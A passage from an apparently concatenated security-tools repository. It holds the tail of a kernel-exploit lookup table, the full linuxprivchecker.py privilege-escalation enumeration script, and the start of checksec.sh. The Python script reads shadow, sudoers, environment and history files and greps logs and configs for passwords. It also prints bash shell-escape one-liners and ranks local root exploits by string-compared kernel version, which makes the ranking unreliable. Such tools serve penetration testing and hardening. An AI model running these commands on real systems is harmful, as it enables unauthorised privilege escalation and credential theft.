'2.6.15', '2.6.16', '2.6.17', 406 | '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', 407 | '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', 408 | '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', 409 | '2.6.36', 410 | ], 411 | cve => '2010-3437', 412 | mil => 'http://www.exploit-db.com/exploits/15150/', 413 | }, 414 | 'video4linux' => { 415 | vuln => [ 416 | '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', 417 | '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11', 418 | '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', 419 | '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', 420 | '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', 421 | '2.6.30', '2.6.31', '2.6.32', '2.6.33', 422 | ], 423 | cve => '2010-3081', 424 | mil => 'http://www.exploit-db.com/exploits/15024/', 425 | }, 426 | 'memodipper' => { 427 | vuln => [ 428 | '2.6.39', '3.0.0', '3.0.1', '3.0.2', '3.0.3', '3.0.4', 429 | '3.0.5', '3.0.6', '3.1.0', 430 | ], 431 | cve => '2012-0056', 432 | mil => 'http://www.exploit-db.com/exploits/18411/', 433 | }, 434 | 'semtex' => { 435 | vuln => [ 436 | '2.6.37', '2.6.38', '2.6.39', '3.0.0', '3.0.1', '3.0.2', 437 | '3.0.3', '3.0.4', '3.0.5', '3.0.6', '3.1.0', 438 | ], 439 | cve => '2013-2094', 440 | mil => 'http://www.exploit-db.com/download/25444/‎', 441 | }, 442 | 'perf_swevent' => { 443 | vuln => [ 444 | '3.0.0', '3.0.1', '3.0.2', '3.0.3', '3.0.4', '3.0.5', 445 | '3.0.6', '3.1.0', '3.2', '3.3', '3.4.0', '3.4.1', 446 | '3.4.2', '3.4.3', '3.4.4', '3.4.5', '3.4.6', '3.4.8', 447 | '3.4.9', '3.5', '3.6', '3.7', '3.8.0', '3.8.1', 448 | '3.8.2', '3.8.3', '3.8.4', '3.8.5', '3.8.6', '3.8.7', 449 | '3.8.8', '3.8.9', 450 | ], 451 | cve => '2013-2094', 452 | mil => 'http://www.exploit-db.com/download/26131', 453 | }, 454 | 'msr' => { 455 | vuln => [ 456 | '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', 457 | '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.27', '2.6.28', 458 | '2.6.29', '2.6.30', 
'2.6.31', '2.6.32', '2.6.33', '2.6.34', 459 | '2.6.35', '2.6.36', '2.6.37', '2.6.38', '2.6.39', '3.0.0', 460 | '3.0.1', '3.0.2', '3.0.3', '3.0.4', '3.0.5', '3.0.6', 461 | '3.1.0', '3.2', '3.3', '3.4', '3.5', '3.6', 462 | '3.7.0', '3.7.6', 463 | ], 464 | cve => '2013-0268', 465 | mil => 'http://www.exploit-db.com/exploits/27297/', 466 | }, 467 | ); 468 | } 469 | -------------------------------------------------------------------------------- /linux_privesc.py: -------------------------------------------------------------------------------- 1 | #!/usr/env python 2 | 3 | ############################################################################################################### 4 | ## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script 5 | ## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift 6 | ##------------------------------------------------------------------------------------------------------------- 7 | ## [Details]: 8 | ## This script is intended to be executed locally on a Linux box to enumerate basic system info and 9 | ## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text 10 | ## passwords and applicable exploits. 11 | ##------------------------------------------------------------------------------------------------------------- 12 | ## [Warning]: 13 | ## This script comes as-is with no promise of functionality or accuracy. I have no plans to maintain updates, 14 | ## I did not write it to be efficient and in some cases you may find the functions may not produce the desired 15 | ## results. For example, the function that links packages to running processes is based on keywords and will 16 | ## not always be accurate. Also, the exploit list included in this function will need to be updated over time. 17 | ## Feel free to change or improve it any way you see fit. 
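##-------------------------------------------------------------------------------------------------------------
## [Modification, Distribution, and Attribution]:
## You are free to modify and/or distribute this script as you wish. I only ask that you maintain original
## author attribution and not attempt to sell it or incorporate it into any commercial offering (as if it's
## worth anything anyway :)
###############################################################################################################

# conditional import for older versions of python not compatible with subprocess
try:
    import subprocess as sub
    compatmode = 0 # newer version of python, no need for compatibility mode
except ImportError:
    import os # older version of python, need to use os instead
    compatmode = 1

# title / formatting
bigline = "================================================================================================="
smlline = "-------------------------------------------------------------------------------------------------"

print bigline
print "LINUX PRIVILEGE ESCALATION CHECKER"
print bigline
print

# loop through dictionary, execute the commands, store the results, return updated dict
def execCmd(cmdDict):
    """Run every command in cmdDict through the shell and record its output.

    cmdDict maps a label to a dict holding at least "cmd" (a shell command
    string). The command's stdout is split on newlines and stored under
    "results". The same dict object is updated in place and returned.

    Every command in this script is a fixed literal, which is the only reason
    handing the string to a shell is acceptable here; no caller-supplied text
    should ever be placed in "cmd".
    """
    for item in cmdDict:
        cmd = cmdDict[item]["cmd"]
        if compatmode == 0: # newer version of python, use preferred subprocess
            # stderr is captured and then dropped so that it does not interleave with the report
            out, error = sub.Popen([cmd], stdout=sub.PIPE, stderr=sub.PIPE, shell=True).communicate()
            results = out.split('\n')
        else: # older version of python, use os.popen
            echo_stdout = os.popen(cmd, 'r')
            try:
                results = echo_stdout.read().split('\n')
            finally:
                echo_stdout.close() # release the pipe even if the read fails
        cmdDict[item]["results"]=results
    return cmdDict

# print results for each previously executed command, no return value
def printResults(cmdDict):
    """Print the "msg" heading and every non-blank result line of each entry."""
    for item in cmdDict:
        msg = cmdDict[item]["msg"]
        results = cmdDict[item]["results"]
        print "[+] " + msg
        for result in results:
            if result.strip() != "":
                print " " + result.strip()
        print
    return

def writeResults(msg, results):
    """Append a heading and the non-blank result lines to privcheckout.txt.

    The file is opened relative to the current directory in append mode.
    NOTE(review): a fixed file name in a shared, writable directory can be
    pre-created or symlinked by another user; confirm where this is meant to
    run before enabling it (nothing in the visible part of the script calls it).
    """
    f = open("privcheckout.txt", "a")
    try:
        f.write("[+] " + str(len(results)-1) + " " + msg)
        for result in results:
            if result.strip() != "":
                f.write(" " + result.strip())
    finally:
        f.close() # the handle is released even when a write fails
    return

# Basic system info
print "[*] GETTING BASIC SYSTEM INFO...\n"

# placeholder only: execCmd replaces each entry's "results" with a fresh list
results=[]

sysInfo = {"OS":{"cmd":"cat /etc/issue","msg":"Operating System","results":results},
           "KERNEL":{"cmd":"cat /proc/version","msg":"Kernel","results":results},
           "HOSTNAME":{"cmd":"hostname", "msg":"Hostname", "results":results}
          }

sysInfo = execCmd(sysInfo)
printResults(sysInfo)

# Networking Info

print "[*] GETTING NETWORKING INFO...\n"

netInfo = {"NETINFO":{"cmd":"/sbin/ifconfig -a", "msg":"Interfaces", "results":results},
           "ROUTE":{"cmd":"route", "msg":"Route", "results":results},
           "NETSTAT":{"cmd":"netstat -antup | grep -v 'TIME_WAIT'", "msg":"Netstat", "results":results}
          }

netInfo = execCmd(netInfo)
printResults(netInfo)

# File System Info
print "[*] GETTING FILESYSTEM INFO...\n"

driveInfo = {"MOUNT":{"cmd":"mount","msg":"Mount results", "results":results},
             "FSTAB":{"cmd":"cat /etc/fstab 2>/dev/null", "msg":"fstab entries", "results":results}
            }

driveInfo = execCmd(driveInfo)
printResults(driveInfo)

# Scheduled Cron Jobs
cronInfo = {"CRON":{"cmd":"ls -la /etc/cron* 2>/dev/null", "msg":"Scheduled cron jobs", "results":results},
            "CRONW": {"cmd":"ls -aRl /etc/cron* 2>/dev/null | awk '$1 ~ /w.$/' 2>/dev/null", "msg":"Writable cron dirs", "results":results}
           }

cronInfo = execCmd(cronInfo)
printResults(cronInfo)

# User Info
print "\n[*] ENUMERATING USER AND ENVIRONMENTAL INFO...\n"

# NOTE: the ENV and SUDOERS results here, and the SHADOW and password-keyword results
# further down, are echoed to stdout verbatim. Any captured copy of this report holds
# credential material and needs the same handling as the files it was read from.
userInfo = {"WHOAMI":{"cmd":"whoami", "msg":"Current User", "results":results},
            "ID":{"cmd":"id","msg":"Current User ID", "results":results},
            "ALLUSERS":{"cmd":"cat /etc/passwd", "msg":"All users", "results":results},
            "SUPUSERS":{"cmd":"grep -v -E '^#' /etc/passwd | awk -F: '$3 == 0{print $1}'", "msg":"Super Users Found:", "results":results},
            "HISTORY":{"cmd":"ls -la ~/.*_history; ls -la /root/.*_history 2>/dev/null", "msg":"Root and current user history (depends on privs)", "results":results},
            "ENV":{"cmd":"env 2>/dev/null | grep -v 'LS_COLORS'", "msg":"Environment", "results":results},
            "SUDOERS":{"cmd":"cat /etc/sudoers 2>/dev/null | grep -v '#' 2>/dev/null", "msg":"Sudoers (privileged)", "results":results},
            "LOGGEDIN":{"cmd":"w 2>/dev/null", "msg":"Logged in User Activity", "results":results}
           }

userInfo = execCmd(userInfo)
printResults(userInfo)

if "root" in userInfo["ID"]["results"][0]:
    print "[!] ARE YOU SURE YOU'RE NOT ROOT ALREADY?\n"

# File/Directory Privs
print "[*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...\n"

fdPerms = {"WWDIRSROOT":{"cmd":"find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep root", "msg":"World Writeable Directories for User/Group 'Root'", "results":results},
           "WWDIRS":{"cmd":"find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root", "msg":"World Writeable Directories for Users other than Root", "results":results},
           "WWFILES":{"cmd":"find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null", "msg":"World Writable Files", "results":results},
           "SUID":{"cmd":"find / \( -perm -2000 -o -perm -4000 \) -exec ls -ld {} \; 2>/dev/null", "msg":"SUID/SGID Files and Directories", "results":results},
           "ROOTHOME":{"cmd":"ls -ahlR /root 2>/dev/null", "msg":"Checking if root's home folder is accessible", "results":results}
          }

fdPerms = execCmd(fdPerms)
printResults(fdPerms)

pwdFiles = {"LOGPWDS":{"cmd":"find /var/log -name '*.log' 2>/dev/null | xargs -l10 egrep 'pwd|password' 2>/dev/null", "msg":"Logs containing keyword 'password'", "results":results},
            "CONFPWDS":{"cmd":"find /etc -name '*.c*' 2>/dev/null | xargs -l10 egrep 'pwd|password' 2>/dev/null", "msg":"Config files containing keyword 'password'", "results":results},
            "SHADOW":{"cmd":"cat /etc/shadow 2>/dev/null", "msg":"Shadow File (Privileged)", "results":results}
           }

pwdFiles = execCmd(pwdFiles)
printResults(pwdFiles)

# Processes and Applications
print "[*] ENUMERATING PROCESSES AND APPLICATIONS...\n"

if "debian" in sysInfo["KERNEL"]["results"][0] or "ubuntu" in sysInfo["KERNEL"]["results"][0]:
    getPkgs = "dpkg -l | awk '{$1=$4=\"\"; print $0}'" # debian
else:
    getPkgs = "rpm -qa | sort -u" # RH/other

getAppProc = {"PROCS":{"cmd":"ps aux | awk '{print $1,$2,$9,$10,$11}'", "msg":"Current processes", "results":results},
              "PKGS":{"cmd":getPkgs, "msg":"Installed Packages", "results":results}
             }

getAppProc = execCmd(getAppProc)
printResults(getAppProc) # comment to reduce output

otherApps = { "SUDO":{"cmd":"sudo -V | grep version 2>/dev/null", "msg":"Sudo Version (Check out http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=sudo)", "results":results},
              "APACHE":{"cmd":"apache2 -v; apache2ctl -M; httpd -v; apachectl -l 2>/dev/null", "msg":"Apache Version and Modules", "results":results},
              "APACHECONF":{"cmd":"cat /etc/apache2/apache2.conf 2>/dev/null", "msg":"Apache Config File", "results":results}
            }

otherApps = execCmd(otherApps)
printResults(otherApps)

print "[*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER...\n"

# find the package information for the processes currently running
# under root or another super user

procs = getAppProc["PROCS"]["results"]
pkgs = getAppProc["PKGS"]["results"]
supusers = userInfo["SUPUSERS"]["results"]
procdict = {} # dictionary to hold the processes running as super users

for proc in procs: # loop through each process
    relatedpkgs = [] # list to hold the packages related to a process
    try:
        for user in supusers: # loop through the known super users
            if (user != "") and (user in proc): # if the process is being run by a super user
                procname = proc.split(" ")[4] # grab the process name
                if "/" in procname:
                    procname = procname.split("/")[-1] # keep only the executable's base name
                for pkg in pkgs: # loop through the packages
                    if not len(procname) < 3: # name too short to get reliable package results
                        if procname in pkg:
                            # procdict is keyed by the full process line, so the lookup has to use
                            # proc; testing procname here never matched the key that is read next
                            if proc in procdict:
                                relatedpkgs = procdict[proc] # if already in the dict, grab its pkg list
                            if pkg not in relatedpkgs:
                                relatedpkgs.append(pkg) # add pkg to the list
                procdict[proc]=relatedpkgs # add any found related packages to the process dictionary entry
    except Exception:
        # best effort: a process line with fewer than five fields is skipped,
        # while Ctrl-C is no longer swallowed as it was by a bare except
        pass

for key in procdict:
    print " " + key # print the process name
    # only print the rest if related packages were found
    if procdict[key] and procdict[key][0] != "":
        print " Possible Related Packages: "
        for entry in procdict[key]:
            print " " + entry # print each related package

# EXPLOIT ENUMERATION

# First discover the avaialable tools
print
print "[*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING...\n"

devTools = {"TOOLS":{"cmd":"which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null", "msg":"Installed Tools", "results":results}}
devTools = execCmd(devTools)
printResults(devTools)

print "[+] Related Shell Escape Sequences...\n"
escapeCmd = {"vi":[":!bash", ":set shell=/bin/bash:shell"], "awk":["awk 'BEGIN {system(\"/bin/bash\")}'"], "perl":["perl -e 'exec \"/bin/bash\";'"], "find":["find / -exec /usr/bin/awk 'BEGIN {system(\"/bin/bash\")}' \\;"], "nmap":["--interactive"]}
for cmd in escapeCmd:
    for result in devTools["TOOLS"]["results"]:
        if cmd in result: # substring match against the path printed by `which`
            for item in escapeCmd[cmd]:
                print " " + cmd + "-->\t" + item
print
print "[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...\n"

# Now check for relevant exploits (note: this list should be updated over time; source: Exploit-DB)
# sploit format = sploit name : {minversion, maxversion, exploitdb#, language, {keywords for applicability}} -- current keywords are 'kernel', 'proc', 'pkg' (unused), and 'os'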
def _sploit(minver, maxver, exploitdb, lang, loc=("kernel",), val="kernel"):
    """Build one table entry in the layout the ranking loop below reads."""
    return {"minver":minver, "maxver":maxver, "exploitdb":exploitdb, "lang":lang,
            "keywords":{"loc":list(loc), "val":val}}

# All fields are strings. "loc" names where the keyword "val" is looked for
# ('kernel', 'proc', 'pkg', 'os' or 'mnt'); entries without loc/val are kernel-only.
sploits= { "2.2.x-2.4.x ptrace kmod local exploit":_sploit("2.2", "2.4.99", "3", "c"),
           "< 2.4.20 Module Loader Local Root Exploit":_sploit("0", "2.4.20", "12", "c"),
           "2.4.22 "'do_brk()'" local Root Exploit (PoC)":_sploit("2.4.22", "2.4.22", "129", "asm"),
           "<= 2.4.22 (do_brk) Local Root Exploit (working)":_sploit("0", "2.4.22", "131", "c"),
           "2.4.x mremap() bound checking Root Exploit":_sploit("2.4", "2.4.99", "145", "c"),
           "<= 2.4.29-rc2 uselib() Privilege Elevation":_sploit("0", "2.4.29", "744", "c"),
           "2.4 uselib() Privilege Elevation Exploit":_sploit("2.4", "2.4", "778", "c"),
           "2.4.x / 2.6.x uselib() Local Privilege Escalation Exploit":_sploit("2.4", "2.6.99", "895", "c"),
           "2.4/2.6 bluez Local Root Privilege Escalation Exploit (update)":_sploit("2.4", "2.6.99", "926", "c", ["proc","pkg"], "bluez"),
           "<= 2.6.11 (CPL 0) Local Root Exploit (k-rad3.c)":_sploit("0", "2.6.11", "1397", "c"),
           "MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit":_sploit("0", "99", "1518", "c", ["proc","pkg"], "mysql"),
           "2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit":_sploit("2.6.13", "2.6.17.4", "2004", "c"),
           "2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (2)":_sploit("2.6.13", "2.6.17.4", "2005", "c"),
           "2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (3)":_sploit("2.6.13", "2.6.17.4", "2006", "c"),
           "2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit (4)":_sploit("2.6.13", "2.6.17.4", "2011", "sh"),
           "<= 2.6.17.4 (proc) Local Root Exploit":_sploit("0", "2.6.17.4", "2013", "c"),
           "2.6.13 <= 2.6.17.4 prctl() Local Root Exploit (logrotate)":_sploit("2.6.13", "2.6.17.4", "2031", "c"),
           "Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit":_sploit("4.10", "7.04", "3384", "c", ["os"], "debian"),
           "Linux/Kernel 2.4/2.6 x86-64 System Call Emulation Exploit":_sploit("2.4", "2.6", "4460", "c"),
           "< 2.6.11.5 BLUETOOTH Stack Local Root Exploit":_sploit("0", "2.6.11.5", "4756", "c", ["proc","pkg"], "bluetooth"),
           "2.6.17 - 2.6.24.1 vmsplice Local Root Exploit":_sploit("2.6.17", "2.6.24.1", "5092", "c"),
           "2.6.23 - 2.6.24 vmsplice Local Root Exploit":_sploit("2.6.23", "2.6.24", "5093", "c", ["os"], "debian"),
           "Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit":_sploit("0", "99", "5720", "python", ["os"], "debian"),
           "Linux Kernel < 2.6.22 ftruncate()/open() Local Exploit":_sploit("0", "2.6.22", "6851", "c"),
           "< 2.6.29 exit_notify() Local Privilege Escalation Exploit":_sploit("0", "2.6.29", "8369", "c"),
           "2.6 UDEV Local Privilege Escalation Exploit":_sploit("2.6", "2.6.99", "8478", "c", ["proc","pkg"], "udev"),
           "2.6 UDEV < 141 Local Privilege Escalation Exploit":_sploit("2.6", "2.6.99", "8572", "c", ["proc","pkg"], "udev"),
           "2.6.x ptrace_attach Local Privilege Escalation Exploit":_sploit("2.6", "2.6.99", "8673", "c"),
           "2.6.29 ptrace_attach() Local Root Race Condition Exploit":_sploit("2.6.29", "2.6.29", "8678", "c"),
           "Linux Kernel <=2.6.28.3 set_selection() UTF-8 Off By One Local Exploit":_sploit("0", "2.6.28.3", "9083", "c"),
           "Test Kernel Local Root Exploit 0day":_sploit("2.6.18", "2.6.30", "9191", "c"),
           "PulseAudio (setuid) Priv. Escalation Exploit (ubu/9.04)(slack/12.2.0)":_sploit("2.6.9", "2.6.30", "9208", "c", ["pkg"], "pulse"),
           "2.x sock_sendpage() Local Ring0 Root Exploit":_sploit("2", "2.99", "9435", "c"),
           "2.x sock_sendpage() Local Root Exploit 2":_sploit("2", "2.99", "9436", "c"),
           "2.4/2.6 sock_sendpage() ring0 Root Exploit (simple ver)":_sploit("2.4", "2.6.99", "9479", "c"),
           "2.6 < 2.6.19 (32bit) ip_append_data() ring0 Root Exploit":_sploit("2.6", "2.6.19", "9542", "c"),
           "2.4/2.6 sock_sendpage() Local Root Exploit (ppc)":_sploit("2.4", "2.6.99", "9545", "c"),
           "< 2.6.19 udp_sendmsg Local Root Exploit (x86/x64)":_sploit("0", "2.6.19", "9574", "c"),
           "< 2.6.19 udp_sendmsg Local Root Exploit":_sploit("0", "2.6.19", "9575", "c"),
           "2.4/2.6 sock_sendpage() Local Root Exploit [2]":_sploit("2.4", "2.6.99", "9598", "c"),
           "2.4/2.6 sock_sendpage() Local Root Exploit [3]":_sploit("2.4", "2.6.99", "9641", "c"),
           "2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 Pipe.c Privelege Escalation":_sploit("2.4.1", "2.6.32", "9844", "python"),
           "'pipe.c' Local Privilege Escalation Vulnerability":_sploit("2.4.1", "2.6.32", "10018", "sh"),
           "2.6.18-20 2009 Local Root Exploit":_sploit("2.6.18", "2.6.20", "10613", "c"),
           "Apache Spamassassin Milter Plugin Remote Root Command Execution":_sploit("0", "99", "11662", "sh", ["proc"], "spamass-milter"),
           "<= 2.6.34-rc3 ReiserFS xattr Privilege Escalation":_sploit("0", "2.6.34", "12130", "python", ["mnt"], "reiser"),
           "Ubuntu PAM MOTD local root":_sploit("7", "10.04", "14339", "sh", ["os"], "ubuntu"),
           "< 2.6.36-rc1 CAN BCM Privilege Escalation Exploit":_sploit("0", "2.6.36", "14814", "c"),
           "Kernel ia32syscall Emulation Privilege Escalation":_sploit("0", "99", "15023", "c"),
           "Linux RDS Protocol Local Privilege Escalation":_sploit("0", "2.6.36", "15285", "c"),
           "<= 2.6.37 Local Privilege Escalation":_sploit("0", "2.6.37", "15704", "c"),
           "< 2.6.37-rc2 ACPI custom_method Privilege Escalation":_sploit("0", "2.6.37", "15774", "c"),
           "CAP_SYS_ADMIN to root Exploit":_sploit("0", "99", "15916", "c"),
           "CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit)":_sploit("0", "99", "15944", "c"),
           "< 2.6.36.2 Econet Privilege Escalation Exploit":_sploit("0", "2.6.36.2", "17787", "c"),
           "Sendpage Local Privilege Escalation":_sploit("0", "99", "19933", "ruby"),
           "2.4.18/19 Privileged File Descriptor Resource Exhaustion Vulnerability":_sploit("2.4.18", "2.4.19", "21598", "c"),
           "2.2.x/2.4.x Privileged Process Hijacking Vulnerability (1)":_sploit("2.2", "2.4.99", "22362", "c"),
           "2.2.x/2.4.x Privileged Process Hijacking Vulnerability (2)":_sploit("2.2", "2.4.99", "22363", "c"),
           "Samba 2.2.8 Share Local Privilege Elevation Vulnerability":_sploit("2.2.8", "2.2.8", "23674", "c", ["proc","pkg"], "samba"),
           "open-time Capability file_ns_capable() - Privilege Escalation Vulnerability":_sploit("0", "99", "25307", "c"),
           "open-time Capability file_ns_capable() Privilege Escalation":_sploit("0", "99", "25450", "c"),
         }

# variable declaration
# NOTE: from here on the name `os` holds the /etc/issue banner and no longer the
# os module that the compatibility import at the top of the script may have bound.
os = sysInfo["OS"]["results"][0]
version = sysInfo["KERNEL"]["results"][0].split(" ")[2].split("-")[0]
langs = devTools["TOOLS"]["results"]
procs = getAppProc["PROCS"]["results"]
kernel = str(sysInfo["KERNEL"]["results"][0])
mount = driveInfo["MOUNT"]["results"]
#pkgs = getAppProc["PKGS"]["results"] # currently not using packages for sploit appicability but my in future


# lists to hold ranked, applicable sploits
# note: this is a best-effort, basic ranking designed to help in prioritizing priv escalation exploit checks
# all applicable exploits should be checked and this function could probably use some improvement
#
# NOTE(review): minver/maxver are compared with `version` as plain strings, so the
# ordering is lexicographic ("2.6.9" sorts after "2.6.30"), and a distribution's
# backported fixes are invisible to it. A listed or missing entry is therefore not
# evidence of exposure or of patch state; confirm against the vendor's advisories.
avgprob = []
highprob = []

for sploit in sploits:
    entry = sploits[sploit]
    keyword = entry["keywords"]["val"]
    sploitout = sploit + " || " + "http://www.exploit-db.com/exploits/" + entry["exploitdb"] + " || " + "Language=" + entry["lang"]
    # first check for kernell applicability
    if not ((version >= entry["minver"]) and (version <= entry["maxver"])):
        continue
    # next check language applicability; lang is 1 when a matching tool was reported by `which`
    tools = str(langs)
    if (entry["lang"] == "c") and (("gcc" in tools) or ("cc" in tools)):
        lang = 1
    elif entry["lang"] == "sh":
        lang = 1
    elif entry["lang"] in tools:
        lang = 1
    else:
        lang = 0
    if lang == 0:
        sploitout = sploitout + "**" # added mark if language not detected on system
    # next check keyword matches to determine if some sploits have a higher probability of success
    for loc in entry["keywords"]["loc"]:
        if loc == "proc":
            for proc in procs:
                if keyword in proc:
                    highprob.append(sploitout) # associated with a running process
                    break
            break # a 'proc' location ends the search whether or not a process matched
        elif loc == "os":
            if (keyword in os) or (keyword in kernel):
                highprob.append(sploitout) # specific to this OS
                break
        elif loc == "mnt":
            # mount is a list of output lines, so this is an exact-line membership test
            if keyword in mount:
                highprob.append(sploitout) # specific to a mounted file system
                break
        else:
            avgprob.append(sploitout) # otherwise, consider
average probability/applicability based only on kernel version 357 | 358 | print " Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!" 359 | print 360 | 361 | print " The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system" 362 | for exploit in highprob: 363 | print " - " + exploit 364 | print 365 | 366 | print " The following exploits are applicable to this kernel version and should be investigated as well" 367 | for exploit in avgprob: 368 | print " - " + exploit 369 | 370 | print 371 | print "Finished" 372 | print bigline 373 | 374 | -------------------------------------------------------------------------------- /linux_checksec.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # The BSD License (http://www.opensource.org/licenses/bsd-license.php) 4 | # specifies the terms and conditions of use for checksec.sh: 5 | # 6 | # Copyright (c) 2009-2011, Tobias Klein. 7 | # All rights reserved. 8 | # 9 | # Redistribution and use in source and binary forms, with or without 10 | # modification, are permitted provided that the following conditions 11 | # are met: 12 | # 13 | # * Redistributions of source code must retain the above copyright 14 | # notice, this list of conditions and the following disclaimer. 15 | # * Redistributions in binary form must reproduce the above copyright 16 | # notice, this list of conditions and the following disclaimer in 17 | # the documentation and/or other materials provided with the 18 | # distribution. 19 | # * Neither the name of Tobias Klein nor the name of trapkit.de may be 20 | # used to endorse or promote products derived from this software 21 | # without specific prior written permission. 
22 | # 23 | # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 24 | # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT 25 | # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS 26 | # FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE 27 | # COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, 28 | # INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, 29 | # BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS 30 | # OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED 31 | # AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 32 | # OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF 33 | # THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH 34 | # DAMAGE. 35 | # 36 | # Name : checksec.sh 37 | # Version : 1.5 38 | # Author : Tobias Klein 39 | # Date : November 2011 40 | # Download: http://www.trapkit.de/tools/checksec.html 41 | # Changes : http://www.trapkit.de/tools/checksec_changes.txt 42 | # 43 | # Description: 44 | # 45 | # Modern Linux distributions offer some mitigation techniques to make it 46 | # harder to exploit software vulnerabilities reliably. Mitigations such 47 | # as RELRO, NoExecute (NX), Stack Canaries, Address Space Layout 48 | # Randomization (ASLR) and Position Independent Executables (PIE) have 49 | # made reliably exploiting any vulnerabilities that do exist far more 50 | # challenging. The checksec.sh script is designed to test what *standard* 51 | # Linux OS and PaX (http://pax.grsecurity.net/) security features are being 52 | # used. 53 | # 54 | # As of version 1.3 the script also lists the status of various Linux kernel 55 | # protection mechanisms. 56 | # 57 | # Credits: 58 | # 59 | # Thanks to Brad Spengler (grsecurity.net) for the PaX support. 60 | # Thanks to Jon Oberheide (jon.oberheide.org) for the kernel support. 
61 | # Thanks to Ollie Whitehouse (Research In Motion) for rpath/runpath support. 62 | # 63 | # Others that contributed to checksec.sh (in no particular order): 64 | # 65 | # Simon Ruderich, Denis Scherbakov, Stefan Kuttler, Radoslaw Madej, 66 | # Anthony G. Basile, Martin Vaeth and Brian Davis. 67 | # 68 | 69 | # global vars 70 | have_readelf=1 71 | verbose=false 72 | 73 | # FORTIFY_SOURCE vars 74 | FS_end=_chk 75 | FS_cnt_total=0 76 | FS_cnt_checked=0 77 | FS_cnt_unchecked=0 78 | FS_chk_func_libc=0 79 | FS_functions=0 80 | FS_libc=0 81 | 82 | # version information 83 | version() { 84 | echo "checksec v1.5, Tobias Klein, www.trapkit.de, November 2011" 85 | echo 86 | } 87 | 88 | # help 89 | help() { 90 | echo "Usage: checksec [OPTION]" 91 | echo 92 | echo "Options:" 93 | echo 94 | echo " --file " 95 | echo " --dir [-v]" 96 | echo " --proc " 97 | echo " --proc-all" 98 | echo " --proc-libs " 99 | echo " --kernel" 100 | echo " --fortify-file " 101 | echo " --fortify-proc " 102 | echo " --version" 103 | echo " --help" 104 | echo 105 | echo "For more information, see:" 106 | echo " http://www.trapkit.de/tools/checksec.html" 107 | echo 108 | } 109 | 110 | # check if command exists 111 | command_exists () { 112 | type $1 > /dev/null 2>&1; 113 | } 114 | 115 | # check if directory exists 116 | dir_exists () { 117 | if [ -d $1 ] ; then 118 | return 0 119 | else 120 | return 1 121 | fi 122 | } 123 | 124 | # check user privileges 125 | root_privs () { 126 | if [ $(/usr/bin/id -u) -eq 0 ] ; then 127 | return 0 128 | else 129 | return 1 130 | fi 131 | } 132 | 133 | # check if input is numeric 134 | isNumeric () { 135 | echo "$@" | grep -q -v "[^0-9]" 136 | } 137 | 138 | # check if input is a string 139 | isString () { 140 | echo "$@" | grep -q -v "[^A-Za-z]" 141 | } 142 | 143 | # check file(s) 144 | filecheck() { 145 | # check for RELRO support 146 | if readelf -l $1 2>/dev/null | grep -q 'GNU_RELRO'; then 147 | if readelf -d $1 2>/dev/null | grep -q 'BIND_NOW'; then 148 | echo 
